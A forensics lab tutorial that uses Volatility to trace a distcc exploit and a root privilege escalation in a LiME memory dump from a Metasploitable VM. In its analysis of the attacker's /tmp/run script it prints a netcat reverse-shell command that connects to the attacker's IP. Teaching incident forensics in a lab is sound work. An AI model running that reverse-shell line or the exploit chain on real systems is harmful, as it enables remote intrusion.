ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploitable Project >> Forensics >> Current Page |Views: 12520

(Metasploitable Forensics Project: Lesson 1)

{ Conduct Volatility Analysis of Lime Memory Dump (distcc Exploit)  }


Section 0. Background Information
  1. Metasploitable 
  2. Pre-Requisite Lab
  3. Project Description
    • The following lab will show you how to analyze a lime memory dump of the distcc exploit with Volatility.

  4. What is distcc
    • distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed.

  5. Exploit CVE 2004-2687
    • distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
    • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

  6. Exploit CVE 2009-1185
  7. Lab Notes
    • In this lab we will do the following:
      1. Run an intense NMAP Scan on the Metasploitable VM
      2. Search for the distcc daemon
      3. Use Metasploit to exploit the distcc daemon
      4. Use exploit (http://www.exploit-db.com/download/8572) to escalate the privilege of the daemon user to root.
      5. Conduct Basic Network Forensics.
      6. Create a Lime Forensics Memory Dump.

  8. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2014 No content replication of any kind is allowed without express written permission.

 

Section 1: Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on VplayeMr

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on on the Metasploitable VM
      3. Click on the Open Button

     

  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings

     

  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • By changing from NAT to Bridged opens the VM and network up to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, (3) use an ACL to not allow traffic into your network, etc.

     

  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

 

Section 2: Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.

     

  2. Change the msfadmin password
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.109.
      • Record your IP Address.

 

Section 3: Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on on the BackTrack5R1 VM
      3. Click on the Open Button

     

  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  8. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.112.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

 

Section 4: Download Ubuntu 8:04 Volatility Profile and Lime Dump
  1. Download Metasploitable (Ubuntu 8.04) Profile (Perform on BackTrack)
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).
    • Instructions:
      1. cd /pentest/forensics/volatility-2.3.1/volatility/plugins/overlays/linux
      2. wget http://192.168.1.109/UBUNTU-MSF804.zip
      3. ls -l *.zip

     

  2. Download Dump Files
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).
    • Instructions:
      1. mkdir -p /var/tmp/DUMPS/
      2. cd /var/tmp/DUMPS
      3. wget -r --no-parent --no-host-directories --reject "index.html*" http://192.168.1.109/distcc/
    • Note(FYI):
      1. wget, is a non-interactive [webpage] downloader.
        • -r, recursively retrieve.
        • --no-parent, Do not ever ascend to the parent directory when retrieving recursively.  It guarantees that only the files below a certain hierarchy will be downloaded.
        • --no-host-directories, Disable generation of host-prefixed directories.
        • --reject "index.html*", reject any file that contains index.html*, where (*) is a wildcard .
        • http://192.168.1.109/distcc/, this is the website directory that I want to download.
        • In summary, I want to recursively download the distcc/ directory only, while ignoring any index.html files.

     

  3. Download Dump Files
    • Instructions:
      1. cd /var/tmp/DUMPS/distcc/
      2. ls -lSrh
    • Note(FYI):
      1. ls, list directory contents.
        • -lSrh, use long listing.
        • -lSrh, sort by file size.
        • -lSrh, reverse order while sorting.
        • -lSrh, print sizes in human readable format (e.g., 1K 234M 2G).

 

Section 5: Test Volatility Profile
  1. Test Volatility Profile (Perform on BackTrack)
    • Instructions:
      1. ls -l /pentest/forensics/volatility-2.3.1/volatility/plugins/overlays/linux/
      2. cd /pentest/forensics/volatility-2.3.1
      3. python vol.py --info | grep -i ubuntu
      4. Record the case sensitive profile name.  (See Picture).
        • In my case, it is LinuxUBUNTU-MSF804x86 
    • Note(FYI):
      1. ls -l, show a long listing of what is contained in the profiles directory.  (You should see the profile you created in Metasploitable Project: Lesson 1, named UBUNTU-MSF804.zip).
      2. If properly created, you should see the Profile for Linux UBUNTU-MSF804.

     

  2. Volatility linux_ifconfig
    • Instructions:
      1. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_ifconfig
    • Note(FYI):
      1. linux_ifconfig, prints the active interface information, including IPs, interface name, MAC address, and whether the NIC is in promiscuous mode or not (sniffing).
        • --profile LinuxUBUNTU-MSF804x86, specifies your Metasploitable Profile.
        • -f /var/tmp/DUMPS/distcc/distcc_memory.lime, specifies the location of the lime memory dump.

 

Section 6: Volatility Network Analysis
  1. Volatility linux_netstat
    • Instructions:
      1. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_netstat
    • Note(FYI):
      1. linux_netstat, mimics the netstat command on a live system. It leverages the linux_lsof functionality to list open files in each process.
        • --profile LinuxUBUNTU-MSF804x86, specifies your Metasploitable Profile.
        • -f /var/tmp/DUMPS/distcc/distcc_memory.lime, specifies the location of the lime memory dump.

     

  2. Volatility linux_netstat (Analyze Connections)
    • Instructions:
      1. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_netstat | egrep -i '(3632|4444)'
      2. Record your distcc Process ID.  Mine is 5698.  (See Picture)
      3. Record your netcat Process ID.  Mine is 5777.  (See Picture)
    • Note(FYI):
      1. egrep -i '(3632|4444)', egrep will let me search for any lines that contains the 3632/distcc -OR- 4444/netcat.  The "-i" flag ignores the case.
      2. Every good forensics investigator must learn how to tell a story.  Below there are black arrows that try to illustrate the attack chain.
        1. Black Arrow 1: Process distcc is identified by its port number (3632), which is owned by process ID (5698).
        2. Black Arrow 2: Somehow we need to find out how distcc spawned a TCP connection on port (4444) from Metasploitable (192.168.1.109) to BackTrack (192.168.1.112).
        3. Black Arrow 3 and 4, shows there is a TCP port 4444 connection from Metasploitable (192.168.1.109) to BackTrack (192.168.1.112) that is attached to a shell (sh/5777), which is scary.

     

  3. Comparing Volatility to Live Data Files
    • Instructions:
      1. cd /pentest/forensics/volatility-2.3.1
      2. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_netstat | egrep '(3632|4444)'
      3. egrep '(3632|4444)' /var/tmp/DUMPS/distcc/distcc_netstat.txt
      4. egrep '(3632|4444)' /var/tmp/DUMPS/distcc/distcc_lsof.txt
    • Note(FYI):
      1. egrep '(3632|4444)', egrep will let me search for any connections that contain TCP/3632/distcc -OR- TCP/4444.  Remember the distcc exploit uses the cmd/unix/bind_ruby payload which continually listens for a connection and spawns a command shell via Ruby which opens a TCP connection over port 4444.
      2. The distcc_netstat.txt was created in the pre-requisite lab in (Section 8, Step 3, Instruction 2). The file contains a network dump (netstat -naop) during the attack.  This file can be used to confirm the volatility results of the lime dump, in which the ruby exploit is connected to TCP/4444.
      3. The distcc_lsof.txt was created in the pre-requisite lab in (Section 8, Step 3, Instruction 3). The file contains a lsof dump (lsof) during the attack.  This file can be used to confirm the volatility results of the lime dump, in which the ruby exploit is connected to TCP/4444.

 

Section 7: Volatility Process Analysis
  1. Using Volatility linux_psaux (analyze ruby )
    • Instructions:
      1. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_psaux | grep -i ruby
      2. grep -i ruby /var/tmp/DUMPS/distcc/distcc_pseaf.txt
    • Note(FYI):
      1. linux_psaux, prints the list of active processes.
        • --profile LinuxUBUNTU-MSF804x86, specifies your Metasploitable Profile.
        • -f /var/tmp/DUMPS/distcc/distcc_memory.lime, specifies the location of the lime memory dump.
        • grep -i ruby, displays only processes that contain the name ruby.
        • Remember the distcc exploit uses the cmd/unix/bind_ruby payload which continually listens (ie. using while statements, see picture) for a connection and spawns a command shell via Ruby which opens a TCP connection over port 4444.
      2. This forensics file (distcc_pseaf.txt) was created by dumping all the live (at the time) processes around the same time we created the lime memory dump.  In Instruction #2, the command serves to demonstrate that live file displays the same results as Volatility.

     

  2. Using Volatility linux_pstree (Create File) 
    • Instructions:
      1. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_pstree | tee /var/tmp/DUMPS/distcc/linux_pstree.txt
    • Note(FYI):
      1. linux_pstree, This displays processes using a tree form.  Child processes are indicated by using indentation and periods.
        • --profile LinuxUBUNTU-MSF804x86, specifies your Metasploitable Profile.
        • -f /var/tmp/DUMPS/distcc/distcc_memory.lime, specifies the location of the lime memory dump.
        • tee /var/tmp/DUMPS/distcc/linux_pstree.txt, tee allows a user to view standard output while creating a file.

     

  3. Open linux_pstree.txt
    • Note(FYI):
      • Remember that we are analyzing the distcc exploit, in which secondary attack was engaged on NETLINK by sending a NETLINK message from the user space (/tmp/run). This step shows how we can get one step closer to the process that executed the shell (sh).
    • Instructions:
      1. gedit /var/tmp/DUMPS/distcc/linux_pstree.txt &
        • gedit is a text editor for the GNOME Desktop.
      2. Click the Magnifying Glass.
      3. Search for: Provide your recorded Netcat PID found in (Section 6, Step 2, Instruction 3). Do not use 5777!!!
      4. Click the Find Button
      5. Record the (.run) Parent Process ID (See Picture and below note).
        • In my case, the PID for (.run) is 5776.
      6. Minimize gedit
    • Note(FYI):
      1. The PID for my TCP/4444 session is 5777.  This PID (5777) is  linked to the process (..sh).  The two dots (..) signifies that this process is a child of the parent process directly above it (.run).  Remember the secondary exploit (/tmp/run), executes the netcat command that was spawned by a root shell (/bin/sh).

     

  4. Using Volatility linux_psaux
    • Instructions:
      1. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_psaux | grep 5776
        • Replace PID (5776) with your PID obtained from (Section 6, Step 4, Instruction 4).
    • Note(FYI):
      1. linux_psaux, prints the list of active processes.  This is a plugin subclass of linux_pslist.
      2. In my case, PID (5776) is associated with /bin/sh /tmp/run, which is owned by UID (0).  In other words, somehow the daemon user managed to escalate their privilege by executing /tmp/run which spawned a root shell.

 

Section 8: Analyzing tmp files
  1. Analyzing tmp files
    • Note(FYI):
    • Instructions:
      1. cd /var/tmp/DUMPS/distcc/
      2. tar zxvf tmp.tar.gz
      3. cd tmp
      4. ls -la
    • Note(FYI):
      1. This is where you stored the forensic distcc files.
      2. tar zcvf, Here we use tar to un-zip the tmp.tar.gz archive file. 
        • z, use un-zip the archive.
        • v, verbosely list files processed
        • x, extract archive.
        • o, maintain permissions.
        • f, specify archive file, directory or device
      3. This tmp directory contains the contents from the Ubuntu tmp directory.
      4. ls -la, look at all the files in the tmp directory.
      5. Notice the run and exploit-8572.c files.

     

  2. Capturing the Flag
    • Note(FYI):
      • The goal here is to understand what /tmp/run was doing -AND- to know how it was kicked off.
    • Instructions:
      1. cat run
      2. grep run *
    • Note(FYI):
      1. cat run, This will display the contents of the run file.
        • #!/bin/sh, This is a shebang directive telling Linux this is a shell script.
        • /bin/netcat -e /bin/sh 192.168.1.112 4444, This mean netcat will connect to IP Address(192.168.1.112) on Port(4444) -AND- spawn a shell.
      2. grep run *, This means to search anything else in the tmp directory for the string run.  By itself, the run executable would only run as the daemon user, so something had to escalate the daemon user privilege to the root user.  That something was the compiled version of exploit.8572.c.

     

Section 9: Proof of Lab
  1. Proof of Lab (On BackTrack)
    • Note(FYI):
      • The following commands will be placed in the lower terminal window.
    • Instructions:
      1. cd /pentest/forensics/volatility-2.3.1
      2. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_netstat | grep "sh/"
      3. python vol.py --profile LinuxUBUNTU-MSF804x86 -f /var/tmp/DUMPS/distcc/distcc_memory.lime linux_psaux | grep "/tmp/run"
      4. cat /var/tmp/DUMPS/distcc/tmp/run
        date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth